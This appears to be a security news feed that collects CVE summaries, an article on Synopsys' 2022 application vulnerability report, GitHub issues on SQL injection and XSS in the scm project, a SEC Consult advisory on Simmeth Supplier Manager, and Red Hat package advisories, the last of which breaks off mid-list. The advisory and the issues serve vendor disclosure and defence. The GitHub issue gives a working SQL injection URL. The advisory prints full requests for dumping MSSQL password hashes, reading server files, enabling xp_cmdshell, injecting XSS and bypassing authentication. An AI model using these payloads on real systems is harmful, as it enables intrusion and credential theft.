A vulnerability, which was classified as critical, was found in Sports Club Management System 119. This affects an unknown part of the file admin/make_payments.php. The manipulation of the argument m_id/plan leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213789 was assigned to this vulnerability.

CVE-2022-4015

LimeSurvey v5.4.4 was discovered to contain a SQL injection vulnerability via the component /application/views/themeOptions/update.php.

CVE-2022-43279

Weak configurations for encryption and missing security headers topped the list of software issues found during a variety of penetration and application security tests.

Nearly every application has at least one vulnerability or misconfiguration that affects security and a quarter of application tests found a highly or critically severe vulnerability, a new study shows.

Weak SSL and TLS configuration, missing Content Security Policy (CSP) header, and information leakage through server banners topped the list of software issues with security implications, according to findings in software and hardware tools conglomerate Synopsys' new  Software Vulnerabilities Snapshot 2022 report published today. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe.

Configuration issues are often put in a less severe bucket, but both configuration and coding issues are equally risky, says Ray Kelly, a fellow with the Software Integrity Group at Synopsys.

"This really just points out that, \[while\] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult," he says. "Unfortunately, static application security testing (SAST) scans cannot perform configuration checks as \[they have\] no knowledge of the production environment where the code will be deployed."

The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. 

Penetration tests, for example, detected 77% of the weak SSL/TLS configuration issues, while dynamic application security testing (DAST) detected the issue in 81% of tests. Both the technologies, plus mobile application security testing (MAST), led to the issue being discovered in 82% of tests, according to the Synopsys report.

    

Most common application vulnerabilities. Source: Synopsys

Other application security firms have documented similar results. Over the past decade, for example, three times more applications are scanned, and each one is scanned 20 times more frequently, Veracode stated in its "State of Software Security" report in February. While that report found that 77% of third-party libraries still had not eliminated a disclosed vulnerability three months after the issue was reported, patched code was applied three times faster.

Software firms that use dynamic and static scanning in concert remediated half of flaws 24 days faster, Veracode stated.

"Continuous testing and integration, which includes security scanning in pipelines, is becoming the norm," the firm stated in a blog post at the time.

**Not Just SAST, Not Just DAST**

Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example.

Yet, the issues star to diverge further down the lists. Penetration tests identified weak password policies in a quarter of applications and cross-site scripting in 22%, while DAST identified applications lacking adequate session timeouts in 38% of tests and those vulnerable to clickjacking in 30% of tests.

Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys's Kelly.

"Having said that, a holistic approach takes time, resources, and money, so this may not be feasible for many organizations," he says. "Taking the time to design security into the process can also help find and eliminate as many vulnerabilities as possible — whatever their type — along the way so that security is proactive and risk is reduced."

Overall the company collected data from nearly 4,400 tests on more than 2,700 programs. Cross-site scripting was the top high-risk vulnerability, accounting for 22% of the vulnerabilities discovered, while SQL injection was the most critical vulnerability category, accounting for 4%.

**Software Supply Chain Dangers**

With open-source software comprising nearly 80% of codebases, it's little surprise that 81% of codebases have at least one vulnerability and another 85% have an open-source component that is four years out of date.

Yet, Synopsys found that, despite those concerns, vulnerabilities in supply-chain security and open-source software components accounted for only about a quarter of issues. The Vulnerable Third-Party Libraries in Use category of security weaknesses was uncovered in 21% of the penetration tests and 27% of the static analysis tests, the report said.

Part of the reason for the lower-than-expected vulnerabilities in software components may be because software composition analysis (SCA) has become more widely used, says Kelly.

"These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production," he says.

Misconfigurations, Vulnerabilities Found in 95% of Applications

A vulnerability, which was classified as critical, was found in MonikaBrzica scm. This affects an unknown part of the file uredi_korisnika.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213699.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

huclilu opened this issue

Nov 15, 2022

· 0 comments

**Comments**

Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4

From line 22 to line 29, $id gets the get data and then brings it into the database for query

$result returns the database connection results and data query results

*   We can use sqlmap to validate

*   Manual SQL injection proof

POC：

http://127.0.0.1/uredi\_korisnika.php?id=1 or (select 1174 from(select count(\*),concat((select user()),floor(rand(0)\*2))x from information\_schema.tables group by x)a)

1 participant

CVE-2022-3998: SQL injection vulnerability exists in scm · Issue #1 · MonikaBrzica/scm

A vulnerability, which was classified as critical, has been found in MonikaBrzica scm. Affected by this issue is some unknown functionality of the file upis_u_bazu.php. The manipulation of the argument email/lozinka/ime/id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-213698 is the identifier assigned to this vulnerability.

Open source software scm has a storage type cross site script attack vulnerability

Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4

In uredi\_ Korisnika.php file, line 42 - line 50,

The information entered by the user is directly requested by post without filtering

upis\_ u\_ bazu.php

The parameters of the post request are assigned to the corresponding variables from line 136 to line 141, and then the information is brought into the database for update. The updated data is stored in the database, causing a storage XSS vulnerability

Enter the xss code in the input box

Then the javascript code executes

CVE-2022-3997: Open source software scm has a storage type cross site script attack vulnerability · Issue #2 · MonikaBrzica/scm

Simmeth System GmbH Supplier Manager (Lieferantenmanager) versions prior to 5.6 suffer from authentication bypass, code execution, cross site scripting, information leakage, remote SQL injection, and various other vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >=======================================================================               title: Multiple Critical Vulnerabilities             product: Simmeth System GmbH Supplier manager (Lieferantenmanager)  vulnerable version: < 5.6       fixed version: 5.6          CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,                      CVE-2022-44015, CVE-2022-44016, CVE-2022-44017              impact: critical            homepage: https://www.simmeth.net               found: 2022-03-01                  by: Steffen Robertz (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"We are an innovative B2B software provider for supply chain management,especially in the areas of supplier management over the entire supplierlifecycle and quality control, supply chain key figures and reporting.Our medium-sized family business is a reliable, practice-oriented partner withan extraordinary wealth of experience: since 2002, our currently more than 70medium-sized and corporate customers have trusted our solutions and ourpragmatically oriented expertise."Source: https://www.simmeth.net/en/company/about-usBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.An in-depth security analysis performed by security professionals ishighly advised, to identify and resolve potential further critical securityissues.  Vulnerability overview/description:-----------------------------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)An attacker can inject raw SQL queries. By activating MSSQL features, theattacker is able to execute arbitrary commands on the MSSQL server.2) Faulty API Design (CVE-2022-44014)A faulty API design allows an attacker to fetch arbitrary SQL tables perdesign. This will leak all user passwords and MSSQL hashes.3) Local File Access (CVE-2022-44016)An attacker can download arbitrary files from the web server by abusing an APIcall.4) Leak of Simmeth's SMTP passwordA cleartext password for the email account "LM@simmeth.net" is leaked duringthe login process.5) Stored Cross-Site Scripting (CVE-2022-44012)An attacker can execute JavaScript code in the browser of the victim if a siteis loaded. The victim's encrypted password can be stolen and most likely bedecrypted.6) Authentication Bypass (CVE-2022-44013)An attacker can access multiple API calls without authentication. Thus, alloutlined attacks can be executed without knowing any valid credentials.7) Errors in Session management (CVE-2022-44017)Due to errors in the session management, an attacker can log back into avictim's account after the victim logged out. This is due to the credentials notbeing cleaned from the local storage after logout.8) Information DisclosureMultiple requests were giving verbose error messages. This helps an attacker infinding and abusing a vulnerability.Proof of concept:-----------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)Following API call can be used to execute arbitrary SQL queries via a subqueryor stacked query in the table name. Because of vulnerability 6, only a validusername is required to send the request.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------The POC above shows an example subquery, which will respond with the resultingdataset. Stacked queries will be executed, however, the results will not becontained in the web server's reply. The example query will dump the MSSQL passwordhashes.Further attacks include arbitrary file read with the following query:(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents)sub;--And code execution via the xp_cmdshell extended procedure:(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell'nslookup some.domain';--2) Faulty API Design (CVE-2022-44014)The API design allows the frontend to supply an arbitrary table name(called <TABLE NAME HERE> in the POC below) into the following request.Because of vulnerability 6, only a valid username is required to send therequest.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "<TABLE NAME HERE>",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------This is a fault by design, as the attacker has full control of the tablename. Therefore, an arbitrary table such as the user table(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.3) Local File Access (CVE-2022-44016)The "GetImages" API call can be abused to read arbitrary files from the filesystem. This is due to the API allowing to set the image path from thefrontend.By pointing the base path to C:\, all files can be accessed.Because of vulnerability 6, the request requires no credentials.-----------------------POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1Content-Length: 229[...]{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"},},"ImagesPath":"C:\\","ListImageNames":[         "Windows\\win.ini",         "boot.ini",         "Windows\\system32\\eula.txt",         "Windows\\System32\\drivers\\etc\\hosts"]}--------------------The files are returned base64 encoded. Thus, even binary data can be extractedfrom the server.4) Leak of Simmeth's SMTP passwordThe following API call will return the current configuration. The configurationseems to contain cleartext credentials from Simmeth's SMTP server. Therequest does not require any credentials.-----------------POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1Content-Length: 70Content-Type: application/json{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}}----------------The server responds with:---------------[...]"KPIIntro":{"IsAccessLog":true,"MailSettings":{"Host":"vwp4261.webpack.hosteurope.de","IsAuthentification":true,"IsSSL":false,"LoginName":"wp10481666-supply","Password":"K***********a","Port":"25","Sender":"LM@simmeth.net"[...]--------------Thus, an attacker could send phishing mails from an official Simmeth account.5) Stored Cross-Site Scripting (CVE-2022-44012)The following request can be used to store JavaScript code into the database. Itwill be fetched and executed in the victim's browser, once the site is visited.Because of vulnerability 6, only a valid username is required to send the request.--------------POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1Content-Length: 3311{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName":"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=xonerror=alert(document.domain)>test","Lie_ID":4167},[...]---------------The XSS can be used to steal the encrypted passwords from the local storage.As the API uses cleartext passwords with every request, it is most likelypossible to exfiltrate the passwords in cleartext as well.6) Authentication Bypass (CVE-2022-44013)All API calls start by supplying the Credential Object.----------------"Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "Password: "*********"     "System": "****"   },----------------However, the password can just be removed. It seems to be only checked on thelogin API call. Thus, all requests can be made with just a username. The testedenvironment contained a User called "simmeth".Most likely this is a default user and thus always available, lowering therequirements for authenticated requests even further.7) Errors in Session management (CVE-2022-44017)An attacker can abuse a session management vulnerability in order to log backinto a user account after the user logged out.The encrypted password and username saved in the local storage of theweb browser is not cleared on logout and always stays valid. Hence, only the stateof the frontend state changes and the user appears to be logged out.An attacker can force the frontend state back into the logged in state byvisiting: https://<your-host>/LMS/LM/#main8) Information DisclosureThe application replies with verbose error messages, when triggeringexceptions. This can help an attacker to gain knowledge about the backend andaid in the development of exploits.Entering e.g. a single apostrophe into the table name of vulnerability 2 willcause the web server to print a full stack trace as well as the rest of the SQLquery. Hence, the SQL statement can easily be updated to execute properly.Vulnerable / tested versions:-----------------------------The test was conducted in version 5.4 which was found to be vulnerable.Vendor contact timeline:------------------------2022-04-01: Contacting vendor through info@simmeth.net2022-04-01: Simmeth requested to know in which customer's environment the             vulnerabilities were discovered.2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already             contains fixes. SEC Consult requests the version number of the fixed version.2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per             unencrypted email.2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new             and currently being fixed.2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.             A new API will be created until the end of the year.2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take             until end of July.2022-09-02: Asking about CVE numbers and if all customers are patched.2022-09-05: Some customers are not yet patched. Current version is phased out by the             end of september. All customers will have to upgrade until then. SEC Consult             will request CVE numbers.2022-10-05: Requested status update.2022-10-17: All customers are updated.2022-11-09: Coordinated release of security advisory.Solution:---------The vendor provides a patched version 5.6 which fixes the identifiedsecurity issues. Please approach your vendor support contact in order to receivethe patches.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF S. Robertz / @2022

Simmeth System GmbH Supplier Manager LFI / SQL Injection / Bypass

Red Hat Security Advisory 2022-8208-01 - Dovecot is an IMAP server for Linux and other UNIX-like systems, written primarily with security in mind. It also contains a small POP3 server, and supports e-mail in either the maildir or mbox format. The SQL drivers and authentication plug-ins are provided as subpackages. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: dovecot security and enhancement update  
Advisory ID:       RHSA-2022:8208-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8208  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-30550  
====================================================================  
1. Summary:

An update for dovecot is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Dovecot is an IMAP server for Linux and other UNIX-like systems, written  
primarily with security in mind. It also contains a small POP3 server, and  
supports e-mail in either the maildir or mbox format. The SQL drivers and  
authentication plug-ins are provided as subpackages.

Security Fix(es):

* dovecot: Privilege escalation when similar master and non-master passdbs  
are used (CVE-2022-30550)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2053368 - installing dovecot-pgsql via kickstart fails on Error in POSTIN scriptlet  
2095399 - [RFE] dovecot use systemd-sysusers  
2105070 - CVE-2022-30550 dovecot: Privilege escalation when similar master and non-master passdbs are used

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dovecot-2.3.16-7.el9.src.rpm

aarch64:  
dovecot-2.3.16-7.el9.aarch64.rpm  
dovecot-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-debugsource-2.3.16-7.el9.aarch64.rpm  
dovecot-mysql-2.3.16-7.el9.aarch64.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-pgsql-2.3.16-7.el9.aarch64.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-pigeonhole-2.3.16-7.el9.aarch64.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.aarch64.rpm

ppc64le:  
dovecot-2.3.16-7.el9.ppc64le.rpm  
dovecot-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-debugsource-2.3.16-7.el9.ppc64le.rpm  
dovecot-mysql-2.3.16-7.el9.ppc64le.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-pgsql-2.3.16-7.el9.ppc64le.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-pigeonhole-2.3.16-7.el9.ppc64le.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.ppc64le.rpm

s390x:  
dovecot-2.3.16-7.el9.s390x.rpm  
dovecot-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-debugsource-2.3.16-7.el9.s390x.rpm  
dovecot-mysql-2.3.16-7.el9.s390x.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-pgsql-2.3.16-7.el9.s390x.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-pigeonhole-2.3.16-7.el9.s390x.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.s390x.rpm

x86_64:  
dovecot-2.3.16-7.el9.x86_64.rpm  
dovecot-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-debugsource-2.3.16-7.el9.x86_64.rpm  
dovecot-mysql-2.3.16-7.el9.x86_64.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-pgsql-2.3.16-7.el9.x86_64.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-pigeonhole-2.3.16-7.el9.x86_64.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dovecot-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-debugsource-2.3.16-7.el9.aarch64.rpm  
dovecot-devel-2.3.16-7.el9.aarch64.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.aarch64.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.aarch64.rpm

ppc64le:  
dovecot-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-debugsource-2.3.16-7.el9.ppc64le.rpm  
dovecot-devel-2.3.16-7.el9.ppc64le.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.ppc64le.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.ppc64le.rpm

s390x:  
dovecot-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-debugsource-2.3.16-7.el9.s390x.rpm  
dovecot-devel-2.3.16-7.el9.s390x.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.s390x.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.s390x.rpm

x86_64:  
dovecot-2.3.16-7.el9.i686.rpm  
dovecot-debuginfo-2.3.16-7.el9.i686.rpm  
dovecot-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-debugsource-2.3.16-7.el9.i686.rpm  
dovecot-debugsource-2.3.16-7.el9.x86_64.rpm  
dovecot-devel-2.3.16-7.el9.i686.rpm  
dovecot-devel-2.3.16-7.el9.x86_64.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.i686.rpm  
dovecot-mysql-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.i686.rpm  
dovecot-pgsql-debuginfo-2.3.16-7.el9.x86_64.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.i686.rpm  
dovecot-pigeonhole-debuginfo-2.3.16-7.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30550  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMWNzjgjWX9erEAQiH3g//XnwX6eT00oUJiqmJgLPCS4SA4KlvwZ8q  
ctMrW0k9DUxPvPNi9iR/AGGDI9wvwcQ8h2ZUjWVYsxFDjEpHb3w8WcfsXXM3QfMK  
VX4rau7LcDPx9JVv1J1RW2f/Ok0QIeUn5wwd+lTL97w4lNkC1ur2kZfbscZBDekQ  
IsCkobYNBCSMwHGrxcvF29xlHhGe3rbQtGCWtYPzfq7G9d0AII8ey3uOUAyBlSm+  
Or6CKqwN+xkQSsJdDEValfgSriR1aUHY64rXzZlxFzd/cU7V6NIeakWZ1aXJiBVu  
wgb9NFY2nnrLdeDC8uA1k4WsqxKFtRwrjUHRSeRPFiWSIiWathMcE8WU/4T9MgI3  
dUqKoNlnZV00TTfvfd4tKEiUegyLxTfr3rn563lqpJDXXOV2EYWgd0KBo4XZBlhh  
hQ5Fc+5W4u6AJbM+ysVIVcddQEmTpPztWq+hW+0MNKT8FAjAjIYs02SWHo2hRwDn  
BpSTPLxoTA6B/sFjQ8h7adjkFiN4xx6FtIrrnZwiqg3641WEBLKTMHLjm5MD7SII  
uvHF/Wf88lL3UiwlJlX/4vUNk8nf6bzUyybGbF3iKW7B2owZWdDos3VuGerPMKsP  
8Wh96qWr0jdGVtEH23XilK6KY4urH202gTJMIJjJyBWR/Unu9dI/d5b0mSfFbnQe  
q3J0lreIUyc=/tnO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8208-01

Red Hat Security Advisory 2022-8197-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: php security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:8197-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8197  
Issue date:        2022-11-15  
CVE Names:         CVE-2021-21708 CVE-2022-31625  
====================================================================  
1. Summary:

An update for php is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

PHP is an HTML-embedded scripting language commonly used with the Apache  
HTTP Server.

The following packages have been upgraded to a later upstream version: php  
(8.0.20). (BZ#2095752)

Security Fix(es):

* php: Use after free due to php_filter_float() failing for ints  
(CVE-2021-21708)

* php: Uninitialized array in pg_query_params() leading to RCE  
(CVE-2022-31625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon must be restarted  
for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2055879 - CVE-2021-21708 php: Use after free due to php_filter_float() failing for ints  
2095447 - php-fpm has an odd Requires  
2095752 - Rebase to 8.0.20  
2098521 - CVE-2022-31625 php: Uninitialized array in pg_query_params() leading to RCE  
2104630 - PHP 8 snmp3 Calls Using authPriv or authNoPriv Immediately Return False Without Error Message

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
php-8.0.20-3.el9.src.rpm

aarch64:  
php-8.0.20-3.el9.aarch64.rpm  
php-bcmath-8.0.20-3.el9.aarch64.rpm  
php-bcmath-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-cli-8.0.20-3.el9.aarch64.rpm  
php-cli-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-common-8.0.20-3.el9.aarch64.rpm  
php-common-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-dba-8.0.20-3.el9.aarch64.rpm  
php-dba-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-dbg-8.0.20-3.el9.aarch64.rpm  
php-dbg-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-debugsource-8.0.20-3.el9.aarch64.rpm  
php-devel-8.0.20-3.el9.aarch64.rpm  
php-embedded-8.0.20-3.el9.aarch64.rpm  
php-embedded-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-enchant-8.0.20-3.el9.aarch64.rpm  
php-enchant-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-ffi-8.0.20-3.el9.aarch64.rpm  
php-ffi-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-fpm-8.0.20-3.el9.aarch64.rpm  
php-fpm-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-gd-8.0.20-3.el9.aarch64.rpm  
php-gd-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-gmp-8.0.20-3.el9.aarch64.rpm  
php-gmp-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-intl-8.0.20-3.el9.aarch64.rpm  
php-intl-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-ldap-8.0.20-3.el9.aarch64.rpm  
php-ldap-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-mbstring-8.0.20-3.el9.aarch64.rpm  
php-mbstring-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-mysqlnd-8.0.20-3.el9.aarch64.rpm  
php-mysqlnd-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-odbc-8.0.20-3.el9.aarch64.rpm  
php-odbc-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-opcache-8.0.20-3.el9.aarch64.rpm  
php-opcache-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-pdo-8.0.20-3.el9.aarch64.rpm  
php-pdo-debuginfo-8.0.20-3.el9.aarch64.rpm  
php-pgsql-8.0.20-3.el9.aarch64.rpm  
